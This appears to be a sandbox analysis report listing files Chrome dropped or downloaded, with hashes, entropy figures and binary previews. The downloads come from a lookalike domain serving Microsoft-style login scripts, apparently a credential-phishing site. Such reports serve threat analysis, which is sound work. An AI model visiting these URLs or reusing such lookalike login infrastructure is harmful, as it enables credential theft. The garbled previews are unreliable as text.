                                          Preview:L..................F.@.. ...$+.,....1.......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 6 13:13:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.9990409335362567
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CD4D9D781221B68C84528D6475486C70
                                          SHA1:17B6358464FB7BA58CE31910E52CC37E976F5023
                                          SHA-256:E914040A2E065C1A7C8AEBE44D64B8430E45916E8D4FB30431A0E6C2B549523F
                                          SHA-512:BF16D2D39CC81332787AC8ABDA08D3C07A16A4688F7436C8E87821490402B0E10B8ECC613FBA5EA1A0F4777780A511D71D37FE37B0CC9D9109AF7A52EC24C757
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....*......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jun 6 13:13:36 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):4.008389286458454
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:005BE660600DAD72C191778E6AE49BF8
                                          SHA1:27FE9D0AA804985756F8BDA6BA66EADAA92FE004
                                          SHA-256:0ED065BC6F6E844A6C0766703D3ABEF8A52F3ECE7466604BDEBEDF0A19087955
                                          SHA-512:55117EBADEC2FB1CD80FFE4778268D0EC3A142DBBCED3632608F01F1013ED850CD23D89A481C964FCDF221867754ADDC0C87A883069DB21670C609E18493F9BF
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............g......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2451
                                          Category:downloaded
                                          Size (bytes):1162
                                          Entropy (8bit):7.842201335884505
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F40BC02C851777352BBFFDE98ADB5759
                                          SHA1:F9D127058C02438A07D73C03E1C799120BFA66C2
                                          SHA-256:6529723AC1C652BBB33CAEEA99D1DA259ACA985B47E8A9A35954C455A35B585E
                                          SHA-512:C1F811EBD1E904C9000AF1CF3AD9252A4E6F1FEC69317F5765902B2897BC35C748C81DB72992C173A8D72D8CE6A11B0EFE32C2C0259F2B57858E3E83725F89A1
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://l1ve.signedfiless.com/Me.htm?v=3
                                          Preview:...........Vmo.H..._.V....C...:.w*..EMO...I......Z..IE..o..N+U.a.<.<....+.,..}+.y....|...w.b0.J8....#.L......R..Q1$....ZZz....~.|I.2.!..1.F......m.]T..U&.om..2.$.5O!..a.hSU.*x...C..:.;._.46...e...@..0....x-..Q.OH...i.@-...c.X$..J.....p#..1..[..1.Z..I{.J9 ...c.].@m.|q<C.=..!....($.....[.....#x:.d.1.7v!.c...t]..@.s...?_./..1.O..3...G...W;~I........H...G.D:.:..{.T+..O...F[U.B.S.N.d......$.Q.g..o8VS7Z.&D0...}.9.....XX*...e.|B..v..V+.8.+.[.6.d....x.......,!B+'...9.[.RK..o .A...X.Qi....RE.IY6.S$...4.U.-z....9.f<O.&.\4LVL..n....:.@.5...!.-..e....&s.+@|..pF..."[c....E......m...i.g....}.@.Z.C.......w.m..YI.5o..}.Y.....l..eZ...eKRb.U.B...j.bu.U..s..k?'.b.8.:..>).M..AS..Nq..\IEF#...q..}3p..>~.jr~.z....w..=x(.....+......~...wb]m....b....KX.W.R...U.B.....k.).........4d.=.u'...\`wxt..*VtN....(N.E'.......-...0.T.9>}.iU.D......C....U.-Uh..7v..h.*d...P.N3..u..H{..H...YuI....&..QH.u(.........iI...~.EaIWl......%..yQ.+ltv&x.Nf..W1=...rZw....Q....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):72
                                          Entropy (8bit):4.241202481433726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 55368
                                          Category:downloaded
                                          Size (bytes):15909
                                          Entropy (8bit):7.9848236258516385
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B260B7CA3C8B7A5B88FF414648206F72
                                          SHA1:F3AE08F4023C6168A7E4F563EDE1687D0123946D
                                          SHA-256:3CC016237B13180A2DB2BE5C939343C1FAEE1B63B37237CEDDF6B243DCFE3573
                                          SHA-512:5183F3BB777B7E007B73362F856248D7E2D389B30033903A2E420857DD2339CCE6650258128889B61A35F756B46DD310D663F6A188A1CF78B5C86E6B6EC77BD4
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_xjhg4agbaxjwmouxqhapag2.js
                                          Preview:...........}Ms#G.....u...z |..#h........C)$....`/.n...p..8...;.j.|..G_|.O.........n..How......+++++3+3.w7k..{..R.=.......~....E.......O. ......7.U.Q..?~v.Y.w..;....*._...N...e.zpb'.....7k....|.a...((-...J...W.b..^..>..1...8.....GP...e.........9.s.FX.....n.~.9..l.....ug......a%^..P.(..(X.S...a.1.$t....d4.NF.._..=.n....k.....Ql..E.-\x.0.....N.......o./Bo.....f..1....;O..>....5....d...._..8..ET...A....L...O..7.z.O.^......s.O..h..V...|1..@....XL....o..X/by..q@..,......0.~$........._.......Z.._...~U).....j...C..0..C.M.&.?[<....zg..J7...SYO.KSzS...4.b........V..k.%.[.&....._z..2.|..xz............B......S....M...5nEs2..'..mq.|b.{...Pbi(...[_Lc.Z.....U`./{z......u..[,......P...[....L|..*.a!.!.t..........t*......w.......~.....].......0..(...C.....{....)..QL..X.E. ...c.I:.3_......y...yB........,.....D+.v.Q.VM~Y..........b~.b.E]c...<..[.....*$.Y.!.^.W........`[.S*...vb...)..P.?..p....F........)p..,`l...o@.;.x.....:..f.E....<0..#K\...K(?K/O
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 223846
                                          Category:downloaded
                                          Size (bytes):54366
                                          Entropy (8bit):7.995334526638177
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:E019767577F658370F5D019854893057
                                          SHA1:476483F30919AE8AAC325227D71770C9007EDD83
                                          SHA-256:EA74FCE4676C0D6D3189A5B41BD94A78AE79F78F5455B7FC138D46F840D1DFB7
                                          SHA-512:7DEC8CCC1A21293C9C369D159E4DD5361DE8F34DA6187DC294B80529978D66B8529039C72FB414219B688AB8B3F6CF1AF58DA23E0A13227C079095E172984AC6
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_8e14dcf0e3ff5580d170.js
                                          Preview:...........k{.F.0.}...gF.L."..eR..v.y.O....g...............~...@....f<...F./...u...;............x.y.C...y...sx.....^=}.....N.W.I.Y$.....".w....$..|..a...+.7O.eg.gW..2...8*..2)J..<^f.:.4..;....<}.....ZK.......5..,;iV&Q...9......;U:....$....DyVd....Q...N......N..".;.,//.8...X..ZP7......&shpA...a.I.C\U0i.&K..}m..1..9.N.u....^.'I/:......r...a^Ee.f..oq..e'..y..U..;...T(...<L..;X.."..8-}.^L.._w.....f.w..V.x.kK..K../.A..[....oE....G..ao0...\........Er..s.3E....yV],............{..........9...]v.&......O..x....,.........?...G.......t.[.]|...7...Z.....l..WUq.........J#......{7o....;.........<..?.....G.=....^.Q...~.$..e...I..y...`.<....'q....."P....w...q..X.]X....W.S.Ag...qY......A...O...q._..I.pwb..R.....MxI.....+.......7e._../.r..Q.{:-_]..q......U?.....L.......{\.er.gU9..|..p.'p..aM.........0YVyl...'..-....g....c..n....9....q..7...j...@.>..T...2..X....9.Wu`,..V..'.Y8......P.e?.m..q..XB_~.....W<<_....^o.I.8".c...Y..m.x{S.7.&%./..@....,....a#......F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 113124
                                          Category:downloaded
                                          Size (bytes):20323
                                          Entropy (8bit):7.979831473812092
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:09519204FE1472294CD8FB2D6B10C7AB
                                          SHA1:D172FBE0B5A19FD04D27291CD13B00331E6E15E6
                                          SHA-256:E0C681C273C20F70B6CEA1D4907543A06E134E456BD961B21E2EFD17E6B9CD8F
                                          SHA-512:19507B04B01C2560558101A08E0283C370D05A01BBC9528EB180A41EBF82AE8781F391D599986A849D82BA138E1E32651567C19C23417855291E59BC90841BDA
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/ests/2.1/content/cdnbundles/converged.v2.login.min_9oft0ybq1qhuafkqh5wryq2.css
                                          Preview:...........}ks.6.....\.R;.J.H=-WR;..&>g^53.G.R[.DY<C..$e.WG..... )...{+'g...l............bw_f7.:x..<x.-.*V5)/wE..Y...gy.0.*(.*-o.e.|..._..I.....?<{.!x...W..._..^..p..E..'..Y...<.....*]..6(. ..D..*...Y.......:.ve.?..!..|t...].+.......a.......|.P...u.H.d.d.r.c[..~.L..n.-.}e.H3...r..^..iP.u.*.z.....)..Z.jx..C'......u..{.C...N.o.m~..F(b..f.....h..O.....6....kr.......n2m M$.R..R..i{.~...*..n.dKY..#.Kn.4..G...O..l.#.a=..iU..].S.2.wY..O.|...Z.A....].uU.._%U.<...pp..u=.....C.R..S.....0...A<......&...W..'o.T.."..jO..^+.....DiW.b..7i..7..........lKe.0.~B0.....zQu#...YB.,.{*.&.6..G.6..._...J.i.?.LS$( .^.{..u.-.0....K....M&j..s.yB..+....^.)...7e.....]..eFI_.kRX.B......D[.4......+.u=>....R.`QEK...R..d...*S.. ,c5RKBK(......][..eF{T.....6...".....Uk:..S.0Ro.}B.dwJZ}U..S.F.....&.&.~|......{..Ep.>x..._....}p..=.}...v...7?}...g..1&.......}...^...o.x.>x...../.^....._.........w.v./.........BA...{J..w..$?.}w....?zO.r..5...7.gl..z...g.?.{....R.......yGj
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 141471
                                          Category:downloaded
                                          Size (bytes):49708
                                          Entropy (8bit):7.995035999348534
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:99477B5C332710AFAFB934A2E93990D1
                                          SHA1:96F6C5E82DCF9E9305401E9CAAFE6D27F8CD5157
                                          SHA-256:A9458700E449C6AB7ECD6F027FD9196888A2B46AF59E7399F01804C8ADE6F3C9
                                          SHA-512:A4913E3F5D93B5E95249DF18CF905ECFFEB728A15F1ADB35EAF36BBAD74E7FDE37256C6828FC2B4DE72F3FC2CC26BB84B0D9528C8CDA019DF250EEE91917B961
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://fe63ee9f-c32a1353.signedfiless.com/shared/1.0/content/js/BssoInterrupt_Core_RY3pVDLvjU_KKLtTKxjDFA2.js
                                          Preview:............[.8.8...+.w..OL..hp._..nf.0.......J.t....e .o?u.l.q.../g..J.T.*U.J..k.S......T....J.S.....A......./.......(..q...?.......*aP......h.Fn"..=..|wZ.G.}%...Y..)FI\..q...b.>V.P].U..(y....u._@m.....(.=..]R.......xT..^.XT.'...?.....(..qR..H...x...OX.7..X$.q.%w.ze....>._......{P.:....~.M...X&...u..ie..|.*IXy...Y..`R......L..&x.QR.u3...6q:....U.Y1..".f..O.+......s0p.$..^.....Tt.\..g...U.q..fb.cK.?...+2.T...U.3.T[...Fc{..49..If...9......@xH3q\....^8.L...1..=.6...O7....1#.....Ax.....>.G..8SC..P...Q.Y.O..[VA^.\...6.*...\.....Q.....".w.....O....5w.n:.{.>..$.....9.U|c...Bu .$L.g.~.....P2.@Y...B5."s}=..n.....<....|...it....q.5..J.J...Jn....T.h}}....UK.y=...I....A.ea..K.n,:).|.?.FW....d...|....S..*.`....5...._...,$..51Qe...}.^..Z#K[|....<......8.(r......ZQ..G.zc.wc.A.pL.f&w.H.@<V. .0..w.:+...n..5..I.. .*....S.....p*....8...h2G............@ji.M..W...TE....t..l6}..VZ7..L.....z..........paJV.(J...g....!.|.].......;.zN...5}...pJ.-..|.NN.{Q5..0....D).(
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 1864
                                          Category:dropped
                                          Size (bytes):673
                                          Entropy (8bit):7.6584200238076905
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                          SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                          SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                          SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 190271
                                          Category:downloaded
                                          Size (bytes):61134
                                          Entropy (8bit):7.9953502288966085
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:F6E22923E909581895535ED538866E6D
                                          SHA1:B710762C3278C8FA553EF180AF467183D399C8C8
                                          SHA-256:1985D1C1C02254FD380A132D6977510DDBB8647DEC7F0859913BC23E1228561A
                                          SHA-512:2830545DD86B80863309DBB8073ADEF25589477EBFFED7D1945578F7C9ECF9A0D40C4653493390E94D698A8F8BB58042BD02BFBFA986D522154A006D7B547F0A
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                          Preview:...........{[.H.8....F..VZ..$....!.$..\...r.Jl.#......U.w]...y....K..{uuuu]..8....M.....-.......4..K.><..y..<.vOO...S../.IT.i.2.......Y..N?ign..I{....s8......wU6.>c.<KZY.-<.;.aI...,.....2....8.,.!...8.#..n..xl.o.f.$....|+......s..j.}>..M...()X...].....5..e..Y:cYqw|7k.xd.9...8.....<...x>aYm.-#...Q..E.........e.....&...<....K.=...6........[)....6.s7N...$a..,Na.k..V12..(.`r.Y.+.6..o;...4/.h'.j.....qru.........e...Z...eS..ZU........|b.YC..V#..x.:.V.s.z.,.2...X...pQ.k...2E...7L...nR_...:Koe]....m.%.)`{.6..Y..|.^.....8G..O.E...z...2NX..]..,..d..=.'7.\...m".bC..V%.._XT....s..h....aQ..u.R;l..v....6..4... .?.{.~....1r.._>......5..I.a.?*........=.~...A...H..8...wl..,.6@.[...k..0..7.,l....9...P].S...x..........w..,..),....l.....6.&.f.@.....x....~.*.l..p..8.....h`..,....../C.r...f..~.5e.4. .^z..i2^W..~...a.....$.....DwV.+........_l.K..l^\7!~fS.e....,K..m.97a.2.$.MS.cS...&o...L.<....m.....v.^..1.`.d....Z9.v.q...^..6...e....[..m`3v..x...A.~..j.?.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 1592
                                          Category:dropped
                                          Size (bytes):621
                                          Entropy (8bit):7.6770058072183405
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ECC8894D3791BEDDB4E0226F8DAB065A
                                          SHA1:6510EB51E76A49746C526E432455549B50DE5AF1
                                          SHA-256:64C8C0A9EFBC27AD86EAEC90465B75C52AE8CD68F7E76FC9431DC6AE66072AC3
                                          SHA-512:02B20BE98C22EBF7886FE68008C4ED42E3F8FF6ADC8DD7BC1A43A8C4F6FD56CC932EFC5500249A4FAA5024574A841AD10FC8DDB8221CB7226E0E16DEA63F7052
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:dropped
                                          Size (bytes):2672
                                          Entropy (8bit):6.640973516071413
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 26680
                                          Category:downloaded
                                          Size (bytes):7407
                                          Entropy (8bit):7.9750511297413125
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2DEA0C16ED50A8C68AC7C5763780360F
                                          SHA1:89BBB21CD82BCB07C6F39312F1B8F2E58FAAE252
                                          SHA-256:205B861EDBE7DEE41A4A7D80DA7B33FF42BE48E7E0521F9022C41B4D7807777A
                                          SHA-512:F092CF6BD61B3E544ED04374E26BC055F47C0BA84D0CEFF99C2E3DA716E75CC04A0595C522050D0AAB8046FC67881DFFF48CCAD2FAC92BCBCB14342F0261A51D
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_4d39c0367444c533fcd7.js
                                          Preview:...........]{w.6...?....[.....]...X..ZKI.Mrt(...S.KB.U[.}g....J.........`f...<..._..k[....`.j.].h..........A..x}:.).?...6......I...Pc....#.;.&.....h..4>.Z.........F#........zN.Z.g.@..5....e..~O..2.TsBOP.."L.6.=.k...N.s.Y..\..K...$.Cy...91...1..T.aj}..RMD7..DT..o|....@./..g.b4.Ac...K..DN....q.-.<....N4..,..`yA.X...7+.Lh|.,...z..a%.Fo#...Km.;!.<..&...h.........."`D..h4.,.h.s+./.....h......?..y...rk{....G.........L.IH=.$1]6{..$p...{.#..........gRp........?.:..[..^6..0.Y./0.a,..G..T.V..E_........q...qE......'...T....O...?.Y.y..tJB....f...3...m...v......8...%.{..A\....._.d..w.sBy7L...4c..J..9.1H..7....a..l.....4n....b.+....mc.Y.NGFF.g.y..L.vl..4dP.>..d.Eg...GI...c.....,#J...8..q....l.<.ADc...u..+..../d...I...Qh.z.......Qe.....~..}...O. .j.J..(....O..Y^...}.C..l.GW...,...mV}.."'I....1[@y/....9.[....(.8..g..A1..].KQx.....{3K.wN0....5.!.......=..J..{B.....pN...p..`.^m..iH.J..E.R..y.T.l.e(....M\..o.#p.<.....E.+.2..\bO,.0.K.0.....]p.IV..........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:downloaded
                                          Size (bytes):3620
                                          Entropy (8bit):6.867828878374734
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):28
                                          Entropy (8bit):4.164497779200461
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:17C4BD96DCB397D1D62D24921BC4FEBA
                                          SHA1:2C0F2AFF858069D582A97867B183EBD5DC8A9FCB
                                          SHA-256:3549DBC06BDD994A38C9A29AECD7E8F9577E2150D15F8D6B0533B4D250666514
                                          SHA-512:9659C4D5B7EF0C852428D3AE8A8EE816438E268E4537FFA70823C9CB2C240252E6D9E863B2AE95F39397172EEFAAA73541123DC9255C9B37FC9437C655F55A78
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmoMJR7Ec47dxIFDU9-u70SBQ1Xevf9?alt=proto
                                          Preview:ChIKBw1Pfru9GgAKBw1Xevf9GgA=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 445044
                                          Category:downloaded
                                          Size (bytes):121439
                                          Entropy (8bit):7.997777894781062
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:122A6EAC405B0B369D309EF81494FD3D
                                          SHA1:B785F69698E9699D9D6AF0BAD14D822048DE7D74
                                          SHA-256:43787773DF215A1F15200E9AAE710F253F08BC5058D7B953CA6AAA4835F5781B
                                          SHA-512:D03F7BD26DD04A26FEE79900B80196C3067CFEC4B6391340BEF96AA6C38C4F7C03C7167029995316B09F0065579C8335385AB0FB5C11BD60BF33268650C90CEE
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://acf7658e-c32a1353.signedfiless.com/shared/1.0/content/js/ConvergedLogin_PCore_IzWdInmtlEhKEALU3I54UA2.js
